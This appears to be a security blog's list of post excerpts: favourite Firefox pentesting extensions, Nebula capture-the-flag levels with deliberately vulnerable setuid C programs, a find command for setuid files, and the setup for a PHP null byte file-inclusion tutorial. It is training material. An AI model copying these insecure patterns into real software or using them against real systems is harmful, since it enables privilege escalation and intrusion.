There is a lot of browser extensions developed by the community, here are my favorites.

Firefox

All of this following extensions can be found in the HackerFox suite.

  • Calomel SSL Validation : validate the grade of security of the SSL connection. The button will change color depending on the strength of encryption.
  • Firebug :  Firebug is the best addon ever. Used by web developers to can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
  • HackBar : perfect to test SQL injections. Easy to use and some options like encoding (base64, url, hex), encryption (md5, sha-256, rot13). You can also alter POST data and your referer.
  • HttpFox : display informations about the query : headers, cookies, POST data, time and so on…
...

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? Files for this level can be found in /home/flag02.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;
  
  gid_t gid;
  uid_t uid;
  
  gid = getegid();
  uid = geteuid();
  
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);
  
  buffer = NULL;
  
  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

As the previous level, we here have a suid executable, owned by our target flag02, who uses an environment variable USER to print a super cool message.

...

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? Files for this level can be found in /home/flag01.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys types.h="">
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

This program has been compiled and the executable is available in /home/flag01.

...

Nebula is part of Exploit Exercises, it covers a variety of simple and intermediate challenges that cover Linux privilege escalation, common scripting language issues, and file system race conditions.

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page.

In this first level, you have to find a file owned by flag00 with suid bit. A single command can do the trick:

find / -user flag00 -perm /6000
...

I recently read a nice article on InfoSec Institute (again) about Null byte injection. However I met some problems to make it works in a real situation so I decided to write my own.

First of all, this vulnerability has been fully patched in PHP 5.3.4 (until someone else find another buggy function…), that means you need to install an old version of PHP. Grab it in PHP releases archive. After compiled and configured, it’s very important to set magic_quotes_gpc=Off in the php.ini (it won’t work with ini_set in the script itself).

Then imagine an index.php like this:

<?php
include( '/var/www/pages/'.$_GET['p'].'.php' );
?>

And a /pages/store.php like this:

<?php
echo 'This is the store !';
?>

If you call it directly it will works but in that case index.php is usually used to display common stuffs like header and footer.

...